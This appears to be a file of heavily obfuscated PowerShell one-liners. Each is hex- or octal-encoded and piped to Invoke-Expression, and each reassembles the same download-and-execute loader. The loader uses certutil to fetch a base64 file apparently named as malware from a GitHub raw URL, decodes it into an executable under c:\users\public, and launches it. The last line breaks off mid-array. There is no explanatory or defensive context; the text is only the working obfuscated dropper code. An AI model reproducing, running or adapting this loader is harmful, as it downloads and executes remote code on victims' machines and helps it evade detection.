[STrINg]('20!28-28x28!22}7b!32-36j7d}7b!33x7dx7b-31j37-7dj7b-33x32-7d-7bj33N33N7dZ7b}34Z33N7d!7bN35x7d}7bx31!33x7dZ7b!32-32}7dx7b-34j30-7d!7bx33}34@7d-7b-31!35}7dx7bx33Z36-7dZ7bZ33!37@7dZ7b-39@7d@7bN32x37}7d!7b}31Z32j7dN7bx37N7dx7b-31Z7dj7bj32x39@7dZ7bj33j39@7d@7bx33-30}7d-7bN31-38x7d!7b}31}30Z7dj7bN31@36@7dx7b-32@34}7d-7bN33-38Z7d-7bj32x30!7dx7bZ31Z31x7d!7b-36j7dx7b}30N7dZ7b@32N7d}7b@34N7d!7b!33@31N7d@7bx34Z34x7dj7b}32j38}7dx7b}34x32-7dj7bj34@31x7d-7bx32Z35-7dZ7b!32Z33x7dN7b!38@7d-7b@33j35j7d-7b@31!34@7d@7bj31N39Z7dN7bZ32N31}7d!22}20j2dZ66}27Z65}27Z2c}27@72-65-5fN62-27x2cx27j72!27j2c}27N2dx75Z72Z6c}63!61@63!68@65-20N2dZ73@70j6cZ27j2cZ27x73-7bN30Z7d!7bN30@7dZ70j75}62!6c-69}63N27-2cZ27x72Z61!77j2e@27j2cj27Z63-3ax7b-30@7dx7bN30j7dN75x73x27N2c!27}6cZ77Z61N27!2cZ27N30N27!2cx27j65}74!27}2cx27!70N75Z62j6c}27N2c}27!64Z65@20x27@2cN27!74-65}72j2f}6dx61}27@2cN27j67Z69-74@68}27!2cN27!7b@30-27N2cN27Z2ex63-6f}27N2cj27N69N63x7b@30x7d}7bN30-7dx27-2c-27@69}74j20@2dZ27-2cj27N73}65!72}73j7bN30}7d}7b@30j7dZ27}2c!27j7dZ70Z75}62-6c@69@63!27Z2cN27N72N74N75N74N69j6c-20}2dZ64!65x63@6f@27-2cN27Z7b-30!7dx7bj30-7d-61Z2eZ65!78x65N27-2cN27j75!62-75@73N27Z2cx27x72N73-7bZ27j2c@27Z61-27-2c!27-73j65@27j2cx27!63-65Z72-74Z75Z74-69}6c@20x27x2cN27Z68!69-73@74-68@69-6e@67-2f-74-65!73x74@2fj6d@61}73-27x2c!27j61-20j63N3a-7b@27-2c@27N36j27N2cj27!6b@73-2ex74Z78x74}20-63-3a-7bx30x7dN7b-30x7dZ75!27x2cx27N7b@30}7d!7bx30}27j2c@27-66x20N27x2c-27@68-27Z2cx27}6e!74N27-2cj27@7dj27-2cj27@6dZ2f@69x27-2cZ27!6dx6a}75-73x74x67Z75}6e!6e@61N6d}61}6bx27x2cN27Z3bj20}63-65@27x2c-27}34@5fZ6ej6fZ62-72j65Z61-27N2c-27j65x72Z63x6fZ6eZ74N65N27-2cj27-7bN30!7dj75Z27N2c!27!30}7dx27}2cj27N74@74}70j73N3a!2fZ2fj27-2c}27N7dj27!29Z29!20!2dj46!20x20Z5bx63}68@41Z52-5d!39x32j29x20j7cN69-65j78'.SPlIt('ZNj!x}-@' )|% { ([COnVerT]::toinT16( ( $_.TOSTrING() ) , 16)-As[cHAr]) })+"$(SV  'Ofs' ' ')")
& ( $verboSePrEFerEnCe.TOstRING()[1,3]+'x'-Join'')( [strINg]::JoIN( '',('26%20%28O20v24{65O6e%56v3a~43O4f-6d~73-50>45v63>5b{34-2cU32v34v2cO32~35>5dO2dU4a%4f>69{4e%27O27O29-20O28>20O28v28-22O7b%31O37%7d%7b~35>36v7d-7b>33{34>7d-7bv31v33%7d~7b-33%39{7d~7b%34{32-7d{7b-33%35-7dU7b~32>30{7d-7b-33v31O7d>7b-30O7dU7bU31{32%7d-7b>36~33%7d~7b-31U31>7d{7b~36>36~7d%7b%34{30%7d>7b{38>7d%7bv33-7dO7b%36~35-7dU7b~35%35~7d-7bv33v38O7dU7b~31O36v7d~7b-34>31O7d>7b{32>32v7d>7b-31U35%7dO7bO31~38~7dv7b{36-34>7d-7bv33O32U7dv7b-32U31O7dO7bO33~36>7dU7b{35>30U7d>7b~32-38~7d-7bU35~31O7dv7b{35{39v7d~7b%35%33O7dO7b{33-30v7d>7bO35{37~7d-7b~32~39O7d{7bO34U37O7d{7b{34v34~7d-7b-36-32O7d{7b-36U30O7dO7bU31%34{7dv7b~34~39%7d{7bU36%7d>7b-35O32~7dO7b-35-38~7d~7bO32~7d-7bO33%37%7d-7b~35U7d-7b{36O31O7d~7bU31-39v7d~7b~33>33~7d{7b%32U36v7dO7bU34O38O7dO7b-32%35{7d>7bU39%7d%7bO32{34>7dU7b>32~37U7dU7b~34O7dO7b%35%34%7d~7b-31%30>7dO7b>32-33O7d{7bv34>35U7d-7b%36-37U7d%7bO34U33>7dU7b>37U7d-7b{31>7d-7b{34O36U7d~22%2d>66v27~3av2fU27v2cO27U6e-64O30%6e>27~2cU27{73{27%2cO27%6eU74{65>27>2c{27U65U27-2c>27>64v27~2c{27{74v69~6c%20U2dU64%65%63~6f~64-65~27U2c>27v30U27U2cv27-63~6fU27U2cO27U64-30%6e{27~2cU27~6e-27U2cO27%75>62U75>27U2cv27{2f{72O61%77{2e-67U69O27-2c-27-6cO20>2d%75v72>6c%27O2cO27>20v63%27{2c~27{68O69{6e%27>2c%27U67O75O6e>6eU27U2c%27v63%65v72-74~27%2c>27U67>2fU74-27v2c~27%6eO70U27>2cU27%20{68>74-74O27>2c{27O2fU6d>27U2cv27~61>6b{65U74>68>69>73v74-27O2cO27v64-30U6e{70-27v2cv27-64%30%6e%27O2c~27>20O63O3a%27>2c-27v69~63%64{30%6eU27U2cU27{75{73{27{2cO27U72~2fO6dU61{6c-77v61v72%65-5fO27v2c>27v70O27U2c~27~64>27v2cv27-70v73O27%2c{27%74-27v2cU27{75-62~6cU27%2c%27-69~27~2cU27~73O70{6cv69v74{20-2d~66>27v2c>27O61~73-27>2cU27O64>30v6e~27U2cv27~74U27-2c~27{63-61U63O68>27-2cv27-72%27~2c~27O61>6d-27~2cU27U65~20~2dv27v2c~27-64v27{2cO27U63O64%30~27-2c>27{75v62U6c-27O2cv27-61v2eU65O78{65U27-2cU27%75>62O6c{69v27~2c%27O64>30{6e-61>27>2cv27%65{72U74U75~27-2cv27-74>65%27v2c{27O62U36~34v5f>6e~6f{62-72U65%61~6b-73v2e~74{78U74U20v63%3a{27-2cv27-20O63~3a%64>30O6eO64O30{6eU75O73%27v2c{27v72O73>64%30v6e>27-2c%27O72-73%64-30U27v2cv27%74>2e%63>6f~6d>2fU69O6dO6a~75{73%27-2c~27{75>74{27{2c~27{30O6eU27~2c%27{65-72>27-2c{27%64>30O6e{64O30-6e~75U73-65U27~2c>27v30v6eU61{3b~27%2c-27v30>27U2c~27-6e{64>27{2c~27v74~68O27v2cv27{65U73v27%2cU27O6eO27U2c~27{73O65{27{2c>27~69-63>27%29~29-2e-52%45>70-6cv41~43v65-28{28%5b~43O48v41v72>5d-31v30U30v2b>5b>43{48{41U72v5d~34U38U2b~5bO43~48v41O72U5dO31~31v30U29U2c%27>5c-27-29-20v29' -sPLit '{'-SpLiT 'v' -SPlIT'O' -SPlIT'U' -SpLIT '>' -SpLIt '%'-splIT'~'-sPLIT'-'|%{( [cONvERT]::toinT16( ( [striNg]$_ ),16 ) -As [Char]) } ) ) )
&( $env:COmSpEc[4,15,25]-join'')( "$( Set-itEm  'VarIAblE:ofs'  '')" +[sTrIng]( '20y26&20!28{20;24y56!45y72%62&6fy53W65!50W52&65{66&65&52G65;4e&63%45%2e%74G4f&53y54!52W69&6e&47;28{29y5b%31&2c&33W5d;2b{27W58W27W2dG4a;4f!69%6e&27y27{29%28!20!28G28&28W22%7b%35!37!7dy7b%37&7dW7bG34W34;7d{7b{32!38&7d%7b%33W34;7dy7by33y37W7dG7bW34G31&7d!7by34!7d%7bG32y32;7d%7b&35G39W7d;7b%32{36W7d%7b;31;30W7d;7b%34y30!7d!7b&32;31&7d{7b%32&37W7d;7b!35%30;7d%7by34&33!7d%7bW31;34;7d&7by36!7d!7b%33%35!7dW7bG33!33%7d&7b%33W7d;7b;34G37%7d%7b&30;7d;7bG33!32W7d!7b&34y36!7d%7b{32{30G7d!7b&31{39%7dW7b;31G33G7d%7b%35;33!7dy7b%34W35{7d%7b&35;34;7dG7bG34%38y7d&7bW38{7d;7bG33;38;7dy7by33&31{7d{7b%31{32W7d%7bW35y35y7d;7b&34{32%7dW7b{35{38%7d!7b;35W32&7dy7b;35&31;7dG7b;31&35G7d{7b{31%37!7d!7bG35y36{7dW7b{33W36;7dG7by32G33{7d{7bW39&7dW7b{32{34%7d!7b%31%31!7d!7b%32y7d{7bG31{7d!7b%32{39%7d&7by31&38!7dG7b%33%39%7d%7b%31;36{7d%7b!32{35&7d&7b%34!39%7d%7bG35W7dG7b&33;30;7d%22;20%2dy66;20y27!73&2e&27y2c{27W3ay41%43;38&27%2c{27%20!63%27;2c;27{72G65G5f%62y36y34G5fy27y2cG27%2fG72y61&77W2e;67G69;74G68!75!62!75%27&2cy27%43!38{61&2e%27;2c;27;74y65;73!74{2fy6d&27%2cW27%74{69!6c;20;2d%75y72y27!2c;27G3b&27%2cG27G38&41!27%2c%27{6d&2f{69y6d&27&2c%27{38{61&27{2cy27!75!74!69{27;2c{27{41;43{38{70&75G27W2cG27{6b%65&74W68y69G73{74;68%69G6e%67&2fG27W2c&27;38G27;2cW27{41%43!38G70%75;27!2c&27;41y43!38W70%75;27!2c%27;43y38&75G73W65W27%2cG27;73;41;43!38W27y2cW27W73{65%72!27{2cy27!75%73!27G2cW27;73!27y2c{27&63G41{43!27W2c&27{43;27&2c!27;62!6cW27G2c{27;6e&74%65&6e%74{2e%63W6f{27y2c;27{74W67W27{2c;27y68%65{20W27{2c;27&41&27W2c!27&65W78%65%27G2cG27W72&74{27&2cy27%74%78;74y20G63{3a&27;2c%27&2f%6d%61W6cy77%61G27!2c;27!2dG73y70&6c%69&74!20%2dW66{20%68{74&74W27y2c!27%61W73G74!65&72;27G2c%27y6c%69W27G2cy27;70&73{3a!27!2cW27!20W63G65!27y2c{27W72{73&41G43%38G27W2c!27{6aW27%2c&27!2f!27W2c%27G3a!41&43!38G27W2c;27G6dy61&27G2c;27G6cG63;61%63;27!2cy27;63G41;43%38W27!2c&27%41%43{38%41;43{38!75{27!2cG27&6e!6f&62%72G65&61y6bG27G2c{27W61&27!2c!27y69G63;41;43!38G41;27%2cy27%75W6e%6e;61{27G2c&27y72%73G41&43{27&2c%27y38W75G73G65G27;2cW27&62!6c;69!27G2cy27G41!43G38&27W2c!27%6c;20%2d;64{65y63y6f;64&65&20&63&27{2c!27G62{27&2cy27!63y65y72%74&75G27W2c%27{41!43%27{2cW27W65!72!63W6f{27!29;29y2d&43%72&45!70G6c&41y63!65{20W20%28!5bG43W68%41G72%5dy36G35&2b!5b&43;68{41y72%5dG36y37y2b{5b;43;68%41&72y5dy35y36W29{2c;5by43&68%41y72G5d%39G32W29W20{29' -sPlit 'G'-spLIT'{' -SPlIT ';'-sPlit'y' -spLIT'%'-SPLit '!' -splIT'W'-SPlIT'&'|%{ ( [ChAR] ([coNvERT]::tOiNt16(( [strInG]$_),16 ))) })+"$(SET-iTEM  'VARiable:ofS' ' ')" )
. ( $Env:ComSpeC[4,24,25]-jOiN'') ( " $(Set-VarIAble 'Ofs'  '' )"+ [STRing]( '20<26%20z28&20N24z70<73%48N4f~6d%65~5b%34N5dU2b%24%50~73N48N4fU4dz45_5bU33U30<5d<2b<27_58U27N29z28%28_28N28%22z7bN33z34N7d&7b_32~39N7d_7b_34&37N7dz7b&31<7dN7bz33&38%7dz7b&32%30_7d~7bz34_35z7d_7bU34N34U7d_7bU32U37z7d<7bz33<7d&7bU31<33%7d&7b&31~30<7d_7bz38~7d_7b<32<33<7d&7b&31<32~7dU7bU32&7dU7b<33%31U7dz7b<32N35~7dz7b%34N30~7dU7bU33_36%7dU7bz34_7d~7bz32<34~7dU7b~34%31z7dN7b%34_33N7dU7b~31~37<7d<7b&31%36~7d&7b~32&38&7dU7bN36N7dU7b&33&33z7dz7bU32<31<7d<7b<33<35%7dN7b%31<35N7dN7b%32_36U7dU7b_39<7d%7bU34U36_7dU7b~31U31%7dN7b&35~7d_7bU37&7dU7b&31N39z7d<7b_33z39<7d%7b~33~37~7d&7b<33%32%7dz7b<34_32&7d%7b~30<7d&7bz31&34<7dU7bN31%38U7dN7b~33U30<7dN7bN32&32~7d~22<2dN66%20U27z7b<30U7d_70%27U2c<27<74N74z70~73&3aN2fz2f%72&61~27~2cz27_6e<6f%62U72N27N2c~27~2f&69~6dz6a&75<73%74%67~75~6e%6eU61U6dN61N6b&65U74~68U69~73&74%27U2cz27<65~72U73N7b&30%7d&7b%30N27&2cz27&30z7dN27z2c<27%6cU20%2d<27U2c~27U61&20<63<27<2c<27z74U65&72_2f_27<2c~27%7bU30U7d_7b&30%7dz70N75z62&27%2c%27N65~73z74%2fz6d%61%73&27U2c%27~30z7d%7b<27z2c_27%6cU77U61z72N65%5fU62<36_34_5f&27N2cz27~68~69%6eN67z2f_74&27U2c_27_75~62&6cz69_63z7b_30z27N2c_27<7b_27<2cU27U75&27%2c%27N7d<7b%30N7d~61%3bN20<63~65<72z74%27%2c~27U7dU7bN30N27N2c&27~3a%7b%30&7d<27&2c_27N74N68<75&27U2c_27&7b%30%27%2c~27<2ez65z78~65N27%2c~27&6d<61_27<2cz27_7dN70~27N2cN27U63&27z2cN27<30z7dU75z73N65_72%73&27&2c~27~2eU63<6fU6dz27<2c_27&74<69~27~2c~27~69N6c&20%2d<75U72&6cz63&61U63_68_65%20N2dz73z70~6c_69<74U20_2d_66<20_27%2c~27_7dU61_27<2c<27&65_61_6b<73~2eN74%78z74z20_27z2c%27<7bU27%2cN27&64<65N63_6fN64~65z20U63z3aN27&2c~27z63&65&72~74N75U74&27&2c%27<7dU27U2cz27&73<27~2cN27~7dN75%73_65U72~73U27~2c<27_77U2e%67U69N27_2c_27U7b<30&27N2c<27_3a%7b~30%7dz7bU30&7dz75<27_2cz27~75<62~6cz69<63<7bU27z2c<27~30z7d%27N2cU27%30&27<2c~27z72_63_6f&6e%74&65_6ez74~27%2cz27N62%75~73z65&27_2c_27_6c~69_63_7b%27<2c<27_68%27%29%29N2dz66U20~20%5b~63z48~41&52U5d<39N32<29<29' -spLIT 'N' -splIT'<'-SpLIT'z' -SpLiT '~' -SPLIT'U'-SpLIT'%' -splIT'&' -SPlIT '_'|fOrEACh-obJeCt {( [CHAr] ( [cOnVErt]::TOInt16(( $_.TOsTriNG() ),16) ))} ) +" $( seT-Item 'vArIABlE:OfS'  ' ')" )
" $( sEt-iTem 'vaRIablE:ofs'  '')" + [STRInG]('20O28r28G28O22!7b_35!32G7d_7b~33_33l7dl7bl33G31-7d!7bO36~31r7dl7b-33!7dl7b~36r37-7dG7b~34_32r7dl7br39-7dl7b~35G39O7dO7b!32r37G7dl7bO31l32!7dO7bO34l34l7d_7b~32l35_7dG7b_35!33_7dG7b~30_7dG7bO34_31~7dl7b~36~30l7dl7b~38G7d!7b~33G35_7d!7bG36r7d_7bl34l35_7dl7br33_34!7d-7b~31~31G7dl7b~34l33_7dG7b-35~35!7d_7b~32r36~7dO7bG33l37l7dO7b~33-38_7d!7br31-7d_7b-35~37l7dl7b!34~36G7dO7bl31G33~7d_7b~34_7d_7br31G34-7dG7bO34_30_7dG7br37_7d~7bG32_32l7dO7b_31-39G7d~7bl35~34_7dG7b~35-30r7dr7b_32!38G7d!7b_36-33~7dO7bG35!31~7d-7b-32l33O7d-7bG31l30l7d!7bO34O37O7dG7b~32l30G7dr7bG31~35-7dO7bl36l32-7d!7b!36r34!7d-7bG35O36l7d-7b!36G35!7d~7br32!7dl7b~34O39~7dG7b~32l31O7d_7bG33r32!7dO7bG33~39-7dl7bO32l39r7dl7bG31_37!7dG7b!35O7d_7b~36~36!7dO7bG33-30~7d_7b!36~38_7d-7b_32l34_7dO7b-34O38-7d_7b_31!36G7d~7b!31-38l7dO7bO33l36G7d~7bG35-38~7dl22r2dl66~27r65~72-27-2cr27l2f!6d-27G2c-27-76r34-62l76l34_62O75O73r27-2c!27_61G63!68-65-20G27~2cr27_65~5f!62!36l34O5f-6el6f~62G72!65~27G2cO27-76G34~62r61O20-63l3aG76O34l27~2c-27!6el61~6dr61r6bO65O27r2c_27~76r34!62!76r27r2c_27G67~27-2cl27~20!2d-66O27l2cr27l69l63!76G34l62-76G34l27l2c!27!74_68l69r6e_67_27~2cO27O73~3a~27l2c-27G61l72_27~2cl27O61-6b~73_2e!74O78-74O20~27-2cO27~72l74~75_74~27r2cr27-69O63r76_34G62r76l27-2c_27~62O27l2cl27~34r27G2cl27l62_75G73!27O2c_27O61_3b~20~63~65-27!2c~27l34-27~2cG27~34_27O2c~27G75O62-6cr27_2cO27-76_34~27~2c~27r61~77-2e-67~69r74G27l2cO27!74O27!2c~27G74G74r70G27G2c_27O34O62~27l2cG27~6c~69O63G76_34!27O2c!27r75G73-27O2c-27~74-69-6cG27-2cr27l62G76-34G27_2cl27G74G75O27O2c_27l69l73-27G2c~27~75~6e-27G2cr27-62r27r2cG27_65~27~2c!27-72-27-2c!27_62-70-75G62G27-2c~27G63-3a!27r2c-27!63l6fl6er74l65!6eO27!2c!27-69-74_27l2cr27r2fG74-65_27_2cG27!2fr2f!72O27~2c!27O74G68r27!2cr27!6cl77G27G2cG27~62-27!2c~27~62r76G34l62l70-75G62l6cG27r2c-27l65_72r73!76l27!2c~27l73-76-27~2cO27r34l62~70l27r2cr27~63~65O72r27l2c-27!68l75O62r75l73G27l2cr27-65O72r27_2cO27~73O74-2fr6d!61l73~27!2cG27G65O20r63!27O2c~27G61-27G2c-27O61l2eO65G78!65G27G2c_27~20~68l27-2c!27r74r2e_63G6f~6dO2f_69l6d~6a~75l73_74!27O2c~27G20~2dO75~72l6c!63l27G2c~27r69r6c-27~2c!27r76_27G2cr27~20r2d_64l65r63~6f_64O27O2c_27-3aO27_2cO27_62O76r34O62~27r2cG27~2dr73O70~6cl27G2c-27r65-72r73-27-29_29r20~2d!63-72!45!70r4cr61l43G65_28-5b_43l48O41O52-5dG31G31G38_2bG5b~43~48~41G52!5dr35r32r2bl5bO43-48G41!52-5d!39_38~29~2c~5b!43G48-41_52O5dO39O32G29G20_7cl20l69~45O58'-split 'G' -spliT '~' -spLIt'-' -sPliT'O' -SpLIT '!' -sPLit 'r'-spLIt '_'-SpLIT 'l'| fOREACH{( [CHaR]( [CONverT]::toinT16(([StrINg]$_),16 )))} )+" $(sEt  'oFs'  ' ') "|invOKe-ExPression
INVoKe-EXpressiOn( ( '20k49L4eg76L6fp6bk65g2dL45~58g70L52k45R73&53&69R4fL6e&28~28p28p28w22R7bR36w35R7dL7b~31L33w7dw7bw34g39w7dp7b~34w33k7dg7bg32g37p7d&7bw38w7dp7bw32k34&7d~7b~30g7dp7b&33g37k7d~7bk33L35p7dL7bR35&7dw7bp34p38p7dg7b&35R32R7dg7bk35g31p7dp7bp31~39w7d&7bL32~33k7dp7bR32g32g7dg7bp34p35w7d~7b&31~30~7d&7bR33w36g7d~7bk35w30~7d~7bw32g36g7d~7bg31w7dR7bp34k34R7dg7bg31k37k7dk7bp35p33g7dg7bk34k37g7dk7bg32~38k7dp7b~32R30p7dk7bw33L33~7dw7bR35&37k7dk7b~35g35w7d~7bp33~32L7d~7bg35g38k7d&7bk35k36L7dp7bk31k38k7dL7bp39k7dR7bL36L30k7d&7bg34L32k7dg7bR36&36w7d~7b&33&30R7dg7bR33k39&7dg7bg32g7dp7bL34R30R7dk7bL35g39g7dL7bk34~36k7dR7bk31w35g7dp7bw36~33~7dL7bp33p31p7dk7b~32R39g7dL7b~35w34&7d&7bk33k34R7d~7b&34g7d&7b~33g7d~7bR36L34&7dp7bw37k7dg7bk36~31R7dw7bL36g7dw7b&32w35R7dL7bR31w32R7dR7bw32w31R7dL7bR36k32L7dg7bL31w34p7dk7bk33&38&7d~7b~34w31g7dR7bp31g36R7dg7bL31g31w7dR22L2d~66p20L27g68p65p27~2c~27L69g27&2cR27L54w69R79L27g2cp27p72g73g54g69L27~2cR27g63k3ak54w69g79~54&69~79p75L73&65&27k2cw27~6c&69~74k27p2cw27w20g27g2c&27~62R6cw69L63R54k69g79&27k2cp27~72w6cg63&27k2c&27w74~20L63g27p2cR27k62&75&73R27~2ck27k79L54&69~79~61k2ew65L78w65w27w2cp27w3ak54R69~27L2cL27g72L74&75k27g2c&27g65L72L73p54L69~79w54~27k2cw27k3bk20k27R2cp27L63w54p69g27g2cp27L73p27&2cw27k2eR74g78g27&2cw27L74p27L2c&27p68p69w27p2cg27L79~54R69p79g27w2cg27L2eg27&2cp27w70k73&3ag2f~2f&72R61p77L27g2c&27L61&63p27p2ck27k63p27L2c&27g6e~74g2eR63p6fL6d&2fR27&2cw27w75w27&2cp27~6ep6ek61w6d&61R6bg65&74w27k2c&27p65p63R27~2ck27&73~65k72w73p54g69R27w2c&27R20p2dp64p27k2c~27~65R72&2fg6dL61g6cp77g61p27k2cR27L73g74k68L27g2cw27p65g20k27~2c&27L73R70w27w2ck27p65&72L63w6fw6ep74g27p2cw27&20g2d~27w2c&27L69L79L70g75k62L6ck27k2c~27p79p27~2c~27k70g75~62&6cp69k63w54g69R79g27k2ck27L69&27p2cp27~54g69R27w2ck27&6c~20g2d~27p2ck27R6d&6aL75~27L2cw27g67&69p74R68w75g27&2cL27g69g79R61w27L2cR27R67k75p27L2c&27~20~2d&66w20~27p2ck27k74~69w27&2cR27p65p27g2ck27p74R27w2cL27g68p27~2cR27~74k27~2cg27p6f&64g27&2ck27p67R2fR74&65L73p74w2fR6dg61p73&74g27L2cg27k6fk62R72R65k61~6bg73&27p2cw27w69R6e~27k2cg27p72w65R5fL62~36L34~5fR6eR27w2ck27p54R27L2cL27k3a~54g69~79L27p2cp27k54R69L79~61p27&2c&27w75k73g27L2ck27&63k65w72~74w75k74g69w6cw27p2c&27L79g54p69~79k70p75&27L2c&27~63&65R27&2cp27~79g75w27L29k29k2dg63&72~65p70R4cp61~43k45&20~28R5bg63k48p61k52&5d&38g34k2bg5bp63p48k61k52k5dk31R30p35w2b~5bk63k48~61k52w5dw31w32w31~29~2cw5bp63k48L61&52k5dR39L32w29p29k20'.split('Rk~&gpwL' )| % { ( [ConVERT]::toint16( ( [striNg]$_ ) ,16)-as[chaR]) } )-joIN '' )
&( ([strINg]$VerBosEpreFERENcE)[1,3]+'X'-JOIN'') (( (20 , 28, 28 , 28,22 ,'7b', 32, 32 , '7d' , '7b',31 , 39, '7d' , '7b',34 ,31, '7d' ,'7b' ,32 , 33,'7d' ,'7b', 31 , 30, '7d' ,'7b',31 , 31 , '7d','7b' , 35, 34, '7d','7b', 34 ,36 , '7d', '7b' ,30,'7d' ,'7b', 33,35,'7d' , '7b',35, 31, '7d' , '7b', 31 , 34,'7d' ,'7b',31 , 38 , '7d' ,'7b' , 32,35 ,'7d','7b' ,31 , 36,'7d' ,'7b' ,32 , 37 ,'7d', '7b', 33, 38,'7d','7b', 34, 30 ,'7d','7b', 31,35,'7d' ,'7b' ,32,30,'7d','7b' ,34,'7d' , '7b',31, 37, '7d','7b', 31 ,33 , '7d' , '7b', 33 ,33 ,'7d' ,'7b' ,33,30, '7d', '7b' ,33, '7d','7b', 34 , 33 , '7d' , '7b', 32,36 ,'7d', '7b',33,32 , '7d', '7b',33, 31 ,'7d','7b' , 35 ,30,'7d', '7b' , 34, 39,'7d' ,'7b' ,33, 39 ,'7d', '7b' , 34,32 , '7d' ,'7b' ,33 , 37 ,'7d' , '7b',31 ,'7d' ,'7b' ,32 , '7d','7b' , 34, 38,'7d','7b' , 32, 38, '7d' ,'7b' ,39, '7d', '7b' ,35 , 33,'7d' , '7b', 35 , '7d' ,'7b' , 33 ,36, '7d', '7b' ,34 , 34, '7d', '7b',36 ,'7d', '7b' ,37 ,'7d' ,'7b', 34, 37, '7d', '7b' ,34 ,35 , '7d' , '7b',31, 32 ,'7d', '7b',35, 32,'7d','7b' , 38, '7d','7b' , 32, 31, '7d' , '7b', 32,39,'7d', '7b',32 , 34 ,'7d' , '7b',33,34, '7d',22, '2d', 66 ,20,27 , '3a', '2f' , '2f',72 , 61 , 77 , 27,'2c', 27,'6c' ,27,'2c', 27 , 69 ,63, 27 , '2c' , 27 ,62 , 27,'2c', 27 ,68,27 ,'2c' ,27 , 20 , 63 , 65, 72, 74 ,75 , 74, 69 ,27,'2c' ,27 , '5a' , 63, 51,75 ,73, 65, 72 ,73 ,'5a' , 27,'2c' , 27, 63 ,51, '5a' ,63 ,51, 70 ,75 ,62,'6c' ,69 , 63,'5a' ,63 , 51,'5a', 63,51, 61,20, 63 , 27 , '2c' , 27,63 ,51 ,70,27, '2c' , 27, 51 ,61 ,27 , '2c',27, 73 , 70, '6c',69 ,27 ,'2c', 27,74 ,20,'2d',66 ,20 ,68, 27 , '2c' , 27 , '5a', 63 ,51 , 75 ,73 ,65, 72 ,73 ,27 ,'2c',27 ,'2f',27 ,'2c' ,27 ,65 ,27 ,'2c' ,27, '6a' ,75,73 , 74, 67, 75 ,'6e' , '6e' , 27 ,'2c',27 ,74 ,'2e' , 63 , '6f', 27 , '2c',27,69, 73 ,74, 68, 69 ,'6e' ,67 , '2f',74 , 65, 73,74 , 27,'2c',27, 72, 63 , '6f', '6e',27 ,'2c',27, 74 ,69,'6c',20, '2d' ,27 ,'2c', 27,61,'6d',61,'6b',65 ,74, 27,'2c', 27,75 ,62, '6c' ,69 ,27, '2c' ,27, 63 , 65,72 , 74 , 75, 27,'2c', 27, 61, 63 , 68 , 65, 20 ,'2d',27 ,'2c' , 27 , '5a',63 , 27, '2c', 27 , 74, 65 , '6e' ,27 , '2c' , 27, '6e','6f' , 27 ,'2c' , 27 , '6d', 27,'2c', 27 ,'5a' ,63 ,27 ,'2c',27 ,63, '5a', 63, 51 , 27 ,'2c' , 27,74, 65,72 , '2f', '6d',61,'6c' ,77 , 61 ,72 , 65, '5f',27 , '2c' ,27 ,65 ,61, '6b',27 , '2c', 27, 62, 72 ,27, '2c', 27, '6d',61 ,73,27 ,'2c' ,27,51, 61, '2e' , 65, 78, 65 , 27 ,'2c', 27 ,'2e' , 67 , 69, 74, 68, 27 ,'2c' , 27,'6c' , 20,'2d' , 64 , 65,63,'6f' ,64 ,65 ,20 , 63, '3a',27,'2c',27 , 62,27, '2c', 27 ,'2f', 27 , '2c',27,20,63 ,'3a' , '5a' , 63 ,51 ,'5a' , 63 , 51 ,75, 73,65,72, 73,'5a' , 63 ,27 , '2c' , 27, 69, '6d' ,27, '2c', 27, 75 ,72, '6c' ,63 ,27 , '2c',27 , 51 ,'5a', 63 , 51 ,70, 75 , 27 ,'2c' ,27 , 36 , 34, '5f',27 ,'2c', 27 ,'5a', 63,51 , 27 ,'2c' ,27 , 51,27 , '2c', 27, 74 , 70 ,73 , 27 , '2c' , 27 ,'3a' , '5a',63, 27 ,'2c', 27 ,'5a', 63, 51,27 ,'2c', 27, 78, 74 ,27, '2c' , 27,73 , '2e' , 74,27, '2c' ,27 , 75, 62, 75 ,73 , 27, '2c',27 , '5a' ,63 ,51,'5a', 27, '2c' , 27 , '3b',27, '2c', 27 ,74 ,27 , 29,29,'2d' , 43 , 52 ,45 ,50, '4c', 61 , 43 , 65, 28,'5b' , 63, 68,41 ,72 , '5d' , 39, 30 ,'2b' ,'5b', 63,68,41, 72,'5d', 39 ,39,'2b' ,'5b' , 63 , 68, 41 ,72, '5d' ,38,31 , 29 ,'2c' , '5b', 63 ,68 , 41 , 72 , '5d' ,39 , 32 ,29 , '7c', '2e', 20, 28 , 28, 47 , 76 ,20, 27,'2a' ,'6d', 64, 52 ,'2a' , 27,29, '2e' , '6e' , 41, '4d', 65 , '5b' ,33,'2c',31 , 31 ,'2c', 32, '5d', '2d' , '4a','6f' , 49, '6e' ,27 , 27 , 29) | ForeACh{ ( [char]( [COnVerT]::toint16(($_.ToSTrIng() ),16)))} )-joiN '' )
IeX( -Join((133 ,163,124 ,162, 151, 156, 147, 135,72, 72 , 152 , 117, 151, 156,50,40,47, 47 ,54 , 50 ,40 , 133 ,162, 105 ,107,145 ,170 ,135,72 ,72, 115 ,101 , 124 ,103 ,110,145 ,123, 50 ,40 ,42,51 , 51 ,62,71 ,135,122 , 101 , 150 , 103 ,133 , 40,40 ,106 , 55 ,51, 47 , 145 ,170, 145, 56 , 141 ,175 , 60, 173, 175,60 , 173 , 47,53 ,47,143 ,151 , 154 , 142, 165, 47, 53,47 , 160,175, 60,173, 175,47, 53,47, 60, 173,163, 162, 47, 53 ,47 ,145 , 163 ,165, 175 ,60,47 ,53 ,47 , 173 ,175 , 60 , 173,72 ,143 ,40, 141 ,175 ,60,173, 47 , 53, 47 ,175, 60,47, 53 ,47, 173, 143 ,151, 154 ,142 ,165 ,160 ,175, 47, 53, 47 , 60,173,175 , 60 , 47 ,53 ,47 , 173,163,47 ,53 ,47 ,162 , 47 ,53 , 47 ,145, 163,165 , 47, 53 , 47 , 175, 60 , 173 , 175,60 ,173,72 , 143 ,40,145, 144 , 157, 143,47, 53 ,47 , 145, 144, 47 , 53,47, 55,40 ,154 ,151 ,164,165,164,162,47 ,53, 47 ,145, 143 ,40,73,47 , 53 ,47 , 141, 175,47 , 53, 47 ,60, 173 , 175 ,60 , 173,143 ,151, 47 ,53 , 47 ,154, 47 , 53, 47 ,142 , 165 ,160 , 175, 60, 173 , 175 ,60, 47, 53 , 47, 173 ,163, 162,47, 53,47,145 ,47, 53,47 , 163 ,165, 47 ,53, 47 ,175 ,60,173, 175,60,173 , 72 ,143 ,40 , 164 ,170,164, 56 ,163 ,153 , 141,145 , 47,53 ,47,162, 142 , 157 , 156, 137, 64,66 , 142,137 , 47 ,53,47,145, 162, 141,167, 154 , 141 , 47, 53 , 47 ,155, 57, 162,47,53 , 47, 145, 164, 47, 53 , 47, 163,141,155 , 57, 164, 